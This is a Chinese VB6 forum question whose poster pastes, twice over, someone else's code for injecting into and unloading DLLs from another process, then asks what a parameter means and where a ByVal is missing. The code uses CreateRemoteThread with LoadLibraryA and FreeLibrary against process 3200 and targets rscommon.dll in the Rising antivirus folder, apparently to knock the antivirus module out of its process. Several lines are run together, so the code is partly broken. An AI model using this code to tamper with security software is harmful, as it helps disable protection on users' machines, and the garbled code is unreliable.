以前看到chenhui530写的一个贴子,但是我还是不太会用,希望得到指教
Option Explicit
Private Const PROCESS_CREATE_THREAD = &H2
Private Const PROCESS_QUERY_INFORMATION = &H400
Private Const PROCESS_VM_WRITE = &H20
Private Const PROCESS_VM_OPERATION = &H8
Private Const MEM_COMMIT = &H1000
Private Const MEM_RELEASE = &H8000
Private Const PAGE_READWRITE = &H4
Private Const INFINITE = &HFFFFFFFFPrivate Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, _
lpAddress As Any, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, _
lpAddress As Any, _
ByVal dwSize As Long, _
ByVal dwFreeType As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function GetExitCodeThread Lib "kernel32" (ByVal hThread As Long, lpExitCode As Long) As LongPrivate Function loadmode(ByVal dwProcessId As Long, ByVal pszLibFile As String) As Long
Dim hProcess As Long, hThread As Long
Dim pszLibFileRemote As Long, exitCode As Long
On Error GoTo errhandle
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or _
PROCESS_CREATE_THREAD Or _
PROCESS_VM_OPERATION Or _
PROCESS_VM_WRITE, _
0, dwProcessId)
If hProcess = 0 Then GoTo errhandle
Dim cch As Long, cb As Long
cch = 1 + LenB(StrConv(pszLibFile, vbFromUnicode))
cb = cch
pszLibFileRemote = VirtualAllocEx(hProcess, 0&, cb, MEM_COMMIT, PAGE_READWRITE)
If pszLibFileRemote = 0 Then GoTo errhandle
If (WriteProcessMemory(hProcess, pszLibFileRemote, ByVal pszLibFile, cb, ByVal 0&) = 0) Then GoTo errhandle
Dim pfnThreadRtn As Long
pfnThreadRtn = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
If pfnThreadRtn = 0 Then GoTo errhandle
hThread = CreateRemoteThread(hProcess, ByVal 0&, 0&, ByVal pfnThreadRtn, pszLibFileRemote, 0, ByVal 0&)
If (hThread = 0) Then GoTo errhandle
WaitForSingleObject hThread, INFINITE
GetExitCodeThread hThread, exitCode
loadmode = exitCode
errhandle:
If pszLibFileRemote <> 0 Then _
VirtualFreeEx hProcess, pszLibFileRemote, 0, MEM_RELEASE
If hThread <> 0 Then _
CloseHandle hThread
If hProcess <> 0 Then _
CloseHandle hProcess
End Function
Private Sub Command1_Click()
loadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll"
unloadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll", loadmode(3200, "C:\Program Files\Rising\Rav\rscommon.dll")
End SubPrivate Function unloadmode(ByVal dwProcessId As Long, ByVal pszLibFile As String, ByVal modeH As Long) As Long
Dim hProcess As Long, hThread As Long
Dim pszLibFileRemote As Long, exitCode As Long
Dim injectlibB
On Error GoTo errhandle
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or _
PROCESS_CREATE_THREAD Or _
PROCESS_VM_OPERATION Or _
PROCESS_VM_WRITE, _
0, dwProcessId)
If hProcess = 0 Then GoTo errhandle
Dim cch As Long, cb As Long
cch = 1 + LenB(StrConv(pszLibFile, vbFromUnicode))
cb = cch
pszLibFileRemote = VirtualAllocEx(hProcess, 0&, cb, MEM_COMMIT, PAGE_READWRITE) If pszLibFileRemote = 0 Then GoTo errhandle If (WriteProcessMemory(hProcess, pszLibFileRemote, ByVal pszLibFile, cb, ByVal 0&) = 0) Then GoTo errhandle
'
Dim pfnThreadRtn As Long
pfnThreadRtn = GetProcAddress(GetModuleHandle("Kernel32"), "FreeLibrary") If pfnThreadRtn = 0 Then GoTo errhandle
hThread = CreateRemoteThread(hProcess, ByVal 0&, 1024 * 16, ByVal pfnThreadRtn, ByVal modeH, 0, pszLibFileRemote)
If (hThread = 0) Then GoTo errhandle
WaitForSingleObject hThread, INFINITE
GetExitCodeThread hThread, exitCode
injectlibB = exitCode
errhandle:
If pszLibFileRemote <> 0 Then _
VirtualFreeEx hProcess, pszLibFileRemote, 0, MEM_RELEASE
If hThread <> 0 Then _
CloseHandle hThread
If hProcess <> 0 Then _
CloseHandle hProcess
End Function
主要有两个问题
1,unloadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll", loadmode(3200, "C:\Program Files\Rising\Rav\rscommon.dll")中第三个参数是什么意思呢?
2,据作者自己说少了一个ByVal,不知是哪个地方少了一个ByVAL.
不知还有没有更好的方法,谢谢
Option Explicit
Private Const PROCESS_CREATE_THREAD = &H2
Private Const PROCESS_QUERY_INFORMATION = &H400
Private Const PROCESS_VM_WRITE = &H20
Private Const PROCESS_VM_OPERATION = &H8
Private Const MEM_COMMIT = &H1000
Private Const MEM_RELEASE = &H8000
Private Const PAGE_READWRITE = &H4
Private Const INFINITE = &HFFFFFFFFPrivate Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, _
lpAddress As Any, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, _
lpAddress As Any, _
ByVal dwSize As Long, _
ByVal dwFreeType As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function GetExitCodeThread Lib "kernel32" (ByVal hThread As Long, lpExitCode As Long) As LongPrivate Function loadmode(ByVal dwProcessId As Long, ByVal pszLibFile As String) As Long
Dim hProcess As Long, hThread As Long
Dim pszLibFileRemote As Long, exitCode As Long
On Error GoTo errhandle
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or _
PROCESS_CREATE_THREAD Or _
PROCESS_VM_OPERATION Or _
PROCESS_VM_WRITE, _
0, dwProcessId)
If hProcess = 0 Then GoTo errhandle
Dim cch As Long, cb As Long
cch = 1 + LenB(StrConv(pszLibFile, vbFromUnicode))
cb = cch
pszLibFileRemote = VirtualAllocEx(hProcess, 0&, cb, MEM_COMMIT, PAGE_READWRITE)
If pszLibFileRemote = 0 Then GoTo errhandle
If (WriteProcessMemory(hProcess, pszLibFileRemote, ByVal pszLibFile, cb, ByVal 0&) = 0) Then GoTo errhandle
Dim pfnThreadRtn As Long
pfnThreadRtn = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
If pfnThreadRtn = 0 Then GoTo errhandle
hThread = CreateRemoteThread(hProcess, ByVal 0&, 0&, ByVal pfnThreadRtn, pszLibFileRemote, 0, ByVal 0&)
If (hThread = 0) Then GoTo errhandle
WaitForSingleObject hThread, INFINITE
GetExitCodeThread hThread, exitCode
loadmode = exitCode
errhandle:
If pszLibFileRemote <> 0 Then _
VirtualFreeEx hProcess, pszLibFileRemote, 0, MEM_RELEASE
If hThread <> 0 Then _
CloseHandle hThread
If hProcess <> 0 Then _
CloseHandle hProcess
End Function
Private Sub Command1_Click()
loadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll"
unloadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll", loadmode(3200, "C:\Program Files\Rising\Rav\rscommon.dll")
End SubPrivate Function unloadmode(ByVal dwProcessId As Long, ByVal pszLibFile As String, ByVal modeH As Long) As Long
Dim hProcess As Long, hThread As Long
Dim pszLibFileRemote As Long, exitCode As Long
Dim injectlibB
On Error GoTo errhandle
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or _
PROCESS_CREATE_THREAD Or _
PROCESS_VM_OPERATION Or _
PROCESS_VM_WRITE, _
0, dwProcessId)
If hProcess = 0 Then GoTo errhandle
Dim cch As Long, cb As Long
cch = 1 + LenB(StrConv(pszLibFile, vbFromUnicode))
cb = cch
pszLibFileRemote = VirtualAllocEx(hProcess, 0&, cb, MEM_COMMIT, PAGE_READWRITE) If pszLibFileRemote = 0 Then GoTo errhandle If (WriteProcessMemory(hProcess, pszLibFileRemote, ByVal pszLibFile, cb, ByVal 0&) = 0) Then GoTo errhandle
'
Dim pfnThreadRtn As Long
pfnThreadRtn = GetProcAddress(GetModuleHandle("Kernel32"), "FreeLibrary") If pfnThreadRtn = 0 Then GoTo errhandle
hThread = CreateRemoteThread(hProcess, ByVal 0&, 1024 * 16, ByVal pfnThreadRtn, ByVal modeH, 0, pszLibFileRemote)
If (hThread = 0) Then GoTo errhandle
WaitForSingleObject hThread, INFINITE
GetExitCodeThread hThread, exitCode
injectlibB = exitCode
errhandle:
If pszLibFileRemote <> 0 Then _
VirtualFreeEx hProcess, pszLibFileRemote, 0, MEM_RELEASE
If hThread <> 0 Then _
CloseHandle hThread
If hProcess <> 0 Then _
CloseHandle hProcess
End Function
主要有两个问题
1,unloadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll", loadmode(3200, "C:\Program Files\Rising\Rav\rscommon.dll")中第三个参数是什么意思呢?
2,据作者自己说少了一个ByVal,不知是哪个地方少了一个ByVAL.
不知还有没有更好的方法,谢谢
解决方案 »
免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货